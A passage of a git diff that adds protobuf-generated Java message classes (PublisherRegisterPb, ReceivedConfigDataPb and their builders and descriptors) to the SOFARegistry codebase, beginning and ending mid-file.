com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code PublisherRegisterPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:PublisherRegisterPb) + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOuterClass + .internal_static_PublisherRegisterPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOuterClass + .internal_static_PublisherRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { + getDataListFieldBuilder(); + } + } + + public Builder clear() { + super.clear(); + if (dataListBuilder_ == null) { + dataList_ = java.util.Collections.emptyList(); + bitField0_ = (bitField0_ & ~0x00000001); + } else { + dataListBuilder_.clear(); + } + if (baseRegisterBuilder_ == null) { + baseRegister_ = null; + } else { + baseRegister_ = null; + baseRegisterBuilder_ = null; + } + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOuterClass + .internal_static_PublisherRegisterPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb build() { + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb result = + new com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + if (dataListBuilder_ == null) { + if (((bitField0_ & 0x00000001) == 0x00000001)) { + dataList_ = java.util.Collections.unmodifiableList(dataList_); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.dataList_ = dataList_; + } else { + result.dataList_ = dataListBuilder_.build(); + } + if (baseRegisterBuilder_ == null) { + result.baseRegister_ = baseRegister_; + } else { + result.baseRegister_ = baseRegisterBuilder_.build(); + } + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + .getDefaultInstance()) return this; + if (dataListBuilder_ == null) { + if (!other.dataList_.isEmpty()) { + if (dataList_.isEmpty()) { + dataList_ = other.dataList_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureDataListIsMutable(); + dataList_.addAll(other.dataList_); + } + onChanged(); + } + } else { + if (!other.dataList_.isEmpty()) { + if (dataListBuilder_.isEmpty()) { + dataListBuilder_.dispose(); + dataListBuilder_ = null; + dataList_ = other.dataList_; + bitField0_ = (bitField0_ & ~0x00000001); + dataListBuilder_ = + com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders + ? getDataListFieldBuilder() + : null; + } else { + dataListBuilder_.addAllMessages(other.dataList_); + } + } + } + if (other.hasBaseRegister()) { + mergeBaseRegister(other.getBaseRegister()); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.util.List dataList_ = + java.util.Collections.emptyList(); + + private void ensureDataListIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + dataList_ = + new java.util.ArrayList( + dataList_); + bitField0_ |= 0x00000001; + } + } + + private com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + dataListBuilder_; + + /** repeated .DataBoxPb dataList = 1; */ + public java.util.List + getDataListList() { + if (dataListBuilder_ == null) { + return java.util.Collections.unmodifiableList(dataList_); + } else { + return dataListBuilder_.getMessageList(); + } + } + /** repeated .DataBoxPb dataList = 1; */ + public int getDataListCount() { + if (dataListBuilder_ == null) { + return dataList_.size(); + } else { + return dataListBuilder_.getCount(); + } + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataList(int index) { + if (dataListBuilder_ == null) { + return dataList_.get(index); + } else { + return dataListBuilder_.getMessage(index); + } + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder setDataList( + int index, com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataListBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataListIsMutable(); + dataList_.set(index, value); + onChanged(); + } else { + dataListBuilder_.setMessage(index, value); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder setDataList( + int index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataListBuilder_ == null) { + ensureDataListIsMutable(); + dataList_.set(index, builderForValue.build()); + onChanged(); + } else { + dataListBuilder_.setMessage(index, builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder addDataList(com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataListBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataListIsMutable(); + dataList_.add(value); + onChanged(); + } else { + dataListBuilder_.addMessage(value); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder addDataList( + int index, com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataListBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataListIsMutable(); + dataList_.add(index, value); + onChanged(); + } else { + dataListBuilder_.addMessage(index, value); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder addDataList( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataListBuilder_ == null) { + ensureDataListIsMutable(); + dataList_.add(builderForValue.build()); + onChanged(); + } else { + dataListBuilder_.addMessage(builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder addDataList( + int index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataListBuilder_ == null) { + ensureDataListIsMutable(); + dataList_.add(index, builderForValue.build()); + onChanged(); + } else { + dataListBuilder_.addMessage(index, builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder addAllDataList( + java.lang.Iterable + values) { + if (dataListBuilder_ == null) { + ensureDataListIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, dataList_); + onChanged(); + } else { + dataListBuilder_.addAllMessages(values); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder clearDataList() { + if (dataListBuilder_ == null) { + dataList_ = java.util.Collections.emptyList(); + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + } else { + dataListBuilder_.clear(); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public Builder removeDataList(int index) { + if (dataListBuilder_ == null) { + ensureDataListIsMutable(); + dataList_.remove(index); + onChanged(); + } else { + dataListBuilder_.remove(index); + } + return this; + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder getDataListBuilder( + int index) { + return getDataListFieldBuilder().getBuilder(index); + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataListOrBuilder( + int index) { + if (dataListBuilder_ == null) { + return dataList_.get(index); + } else { + return dataListBuilder_.getMessageOrBuilder(index); + } + } + /** repeated .DataBoxPb dataList = 1; */ + public java.util.List< + ? extends com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataListOrBuilderList() { + if (dataListBuilder_ != null) { + return dataListBuilder_.getMessageOrBuilderList(); + } else { + return java.util.Collections.unmodifiableList(dataList_); + } + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder addDataListBuilder() { + return getDataListFieldBuilder() + .addBuilder( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance()); + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder addDataListBuilder( + int index) { + return getDataListFieldBuilder() + .addBuilder( + index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance()); + } + /** repeated .DataBoxPb dataList = 1; */ + public java.util.List + getDataListBuilderList() { + return getDataListFieldBuilder().getBuilderList(); + } + + private com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataListFieldBuilder() { + if (dataListBuilder_ == null) { + dataListBuilder_ = + new com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder>( + dataList_, + ((bitField0_ & 0x00000001) == 0x00000001), + getParentForChildren(), + isClean()); + dataList_ = null; + } + return dataListBuilder_; + } + + private com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb baseRegister_ = null; + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder> + baseRegisterBuilder_; + /** .BaseRegisterPb baseRegister = 2; */ + public boolean hasBaseRegister() { + return baseRegisterBuilder_ != null || baseRegister_ != null; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister() { + if (baseRegisterBuilder_ == null) { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } else { + return baseRegisterBuilder_.getMessage(); + } + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder setBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb value) { + if (baseRegisterBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + baseRegister_ = value; + onChanged(); + } else { + baseRegisterBuilder_.setMessage(value); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder setBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder builderForValue) { + if (baseRegisterBuilder_ == null) { + baseRegister_ = builderForValue.build(); + onChanged(); + } else { + baseRegisterBuilder_.setMessage(builderForValue.build()); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder mergeBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb value) { + if (baseRegisterBuilder_ == null) { + if (baseRegister_ != null) { + baseRegister_ = + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.newBuilder( + baseRegister_) + .mergeFrom(value) + .buildPartial(); + } else { + baseRegister_ = value; + } + onChanged(); + } else { + baseRegisterBuilder_.mergeFrom(value); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder clearBaseRegister() { + if (baseRegisterBuilder_ == null) { + baseRegister_ = null; + onChanged(); + } else { + baseRegister_ = null; + baseRegisterBuilder_ = null; + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder + getBaseRegisterBuilder() { + + onChanged(); + return getBaseRegisterFieldBuilder().getBuilder(); + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder() { + if (baseRegisterBuilder_ != null) { + return baseRegisterBuilder_.getMessageOrBuilder(); + } else { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } + } + /** .BaseRegisterPb baseRegister = 2; */ + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder> + getBaseRegisterFieldBuilder() { + if (baseRegisterBuilder_ == null) { + baseRegisterBuilder_ = + new com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder>( + getBaseRegister(), getParentForChildren(), isClean()); + baseRegister_ = null; + } + return baseRegisterBuilder_; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:PublisherRegisterPb) + } + + // @@protoc_insertion_point(class_scope:PublisherRegisterPb) + private static final com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public PublisherRegisterPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new PublisherRegisterPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOrBuilder.java new file mode 100644 index 000000000..b97f2bfb6 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOrBuilder.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface PublisherRegisterPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:PublisherRegisterPb) + com.google.protobuf.MessageOrBuilder { + + /** repeated .DataBoxPb dataList = 1; */ + java.util.List getDataListList(); + /** repeated .DataBoxPb dataList = 1; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataList(int index); + /** repeated .DataBoxPb dataList = 1; */ + int getDataListCount(); + /** repeated .DataBoxPb dataList = 1; */ + java.util.List + getDataListOrBuilderList(); + /** repeated .DataBoxPb dataList = 1; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataListOrBuilder( + int index); + + /** .BaseRegisterPb baseRegister = 2; */ + boolean hasBaseRegister(); + /** .BaseRegisterPb baseRegister = 2; */ + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister(); + /** .BaseRegisterPb baseRegister = 2; */ + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOuterClass.java new file mode 100644 index 000000000..03e370213 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPbOuterClass.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class PublisherRegisterPbOuterClass { + private PublisherRegisterPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_PublisherRegisterPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_PublisherRegisterPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\031PublisherRegisterPb.proto\032\017DataBoxPb.p" + + "roto\032\024BaseRegisterPb.proto\"Z\n\023PublisherR" + + "egisterPb\022\034\n\010dataList\030\001 \003(\0132\n.DataBoxPb\022" + + "%\n\014baseRegister\030\002 \001(\0132\017.BaseRegisterPbB7" + + "\n/com.alipay.sofa.registry.common.model." + + "client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(), + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_PublisherRegisterPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_PublisherRegisterPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_PublisherRegisterPb_descriptor, + new java.lang.String[] { + "DataList", "BaseRegister", + }); + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(); + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPb.java new file mode 100644 index 000000000..675adefae --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPb.java @@ -0,0 +1,1103 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code ReceivedConfigDataPb} */ +public final class ReceivedConfigDataPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:ReceivedConfigDataPb) + ReceivedConfigDataPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use ReceivedConfigDataPb.newBuilder() to construct. + private ReceivedConfigDataPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private ReceivedConfigDataPb() { + dataId_ = ""; + group_ = ""; + instanceId_ = ""; + configuratorRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + version_ = 0L; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private ReceivedConfigDataPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + dataId_ = s; + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + group_ = s; + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + instanceId_ = s; + break; + } + case 34: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000008) == 0x00000008)) { + configuratorRegistIds_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000008; + } + configuratorRegistIds_.add(s); + break; + } + case 42: + { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder subBuilder = null; + if (dataBox_ != null) { + subBuilder = dataBox_.toBuilder(); + } + dataBox_ = + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.parser(), + extensionRegistry); + if (subBuilder != null) { + subBuilder.mergeFrom(dataBox_); + dataBox_ = subBuilder.buildPartial(); + } + + break; + } + case 48: + { + version_ = input.readInt64(); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000008) == 0x00000008)) { + configuratorRegistIds_ = configuratorRegistIds_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOuterClass + .internal_static_ReceivedConfigDataPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOuterClass + .internal_static_ReceivedConfigDataPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb.class, + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb.Builder.class); + } + + private int bitField0_; + public static final int DATAID_FIELD_NUMBER = 1; + private volatile java.lang.Object dataId_; + /** string dataId = 1; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } + } + /** string dataId = 1; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int GROUP_FIELD_NUMBER = 2; + private volatile java.lang.Object group_; + /** string group = 2; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } + } + /** string group = 2; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int INSTANCEID_FIELD_NUMBER = 3; + private volatile java.lang.Object instanceId_; + /** string instanceId = 3; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } + } + /** string instanceId = 3; */ + public com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int CONFIGURATORREGISTIDS_FIELD_NUMBER = 4; + private com.google.protobuf.LazyStringList configuratorRegistIds_; + /** repeated string configuratorRegistIds = 4; */ + public com.google.protobuf.ProtocolStringList getConfiguratorRegistIdsList() { + return configuratorRegistIds_; + } + /** repeated string configuratorRegistIds = 4; */ + public int getConfiguratorRegistIdsCount() { + return configuratorRegistIds_.size(); + } + /** repeated string configuratorRegistIds = 4; */ + public java.lang.String getConfiguratorRegistIds(int index) { + return configuratorRegistIds_.get(index); + } + /** repeated string configuratorRegistIds = 4; */ + public com.google.protobuf.ByteString getConfiguratorRegistIdsBytes(int index) 